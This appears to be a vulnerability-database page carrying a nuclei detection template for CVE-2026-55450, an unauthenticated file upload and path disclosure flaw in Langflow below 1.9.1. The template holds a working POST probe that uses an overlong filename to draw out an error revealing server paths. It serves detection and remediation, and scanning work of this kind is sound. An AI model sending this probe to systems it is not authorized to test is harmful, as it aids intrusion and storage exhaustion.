Lucene search
+L

Langflow < 1.9.1 - Unauthenticated File Upload

🗓️ 01 Aug 2026 10:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Langflow below 1.9.1 allows unauthenticated file uploads and path disclosure; upgrade to 1.9.1 or newer.

Related
Refs
Code
id: CVE-2026-55450

info:
  name: Langflow < 1.9.1 - Unauthenticated File Upload
  author: xtr0nix
  severity: critical
  description: |
   Langflow < 1.9.1 contains an unrestricted file upload caused by lack of upload limitations, letting unauthenticated attackers exhaust server space and leak absolute file paths, exploit requires network access.
  impact: |
    Unauthenticated attackers can exhaust server storage and gain information about file paths, potentially aiding further attacks.
  remediation: |
    Update to version 1.9.1 or later.
  reference:
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-x223-p2gf-v735
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:H
    cvss-score: 9.3
    cve-id: CVE-2026-55450
    epss-score: 0.06402
    epss-percentile: 0.92974
    cwe-id: CWE-306,CWE-400,CWE-200
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,langflow,unauth,intrusive

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/upload/11111111-1111-1111-1111-111111111111"

    body: |
      --boundary
      Content-Disposition: form-data; name="file"; filename="x.{{repeat('a', 300)}}"
      Content-Type: text/plain

      probe
      --boundary--
    headers:
      Content-Type: multipart/form-data; boundary=boundary

    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains(body, "[Errno 36] File name too long")
          - contains(content_type, "application/json")
        condition: and
# digest: 4a0a00473045022100b54fe620c474e3c28e26dae752e7b3e8695c03d296bf1444014fc20bd262649902206426f9c3d7f552513a920392d625a06536cd637ae329bb1b85375bb12f93d750:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jul 2026 10:02Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.19.3
EPSS0.06402
SSVC
3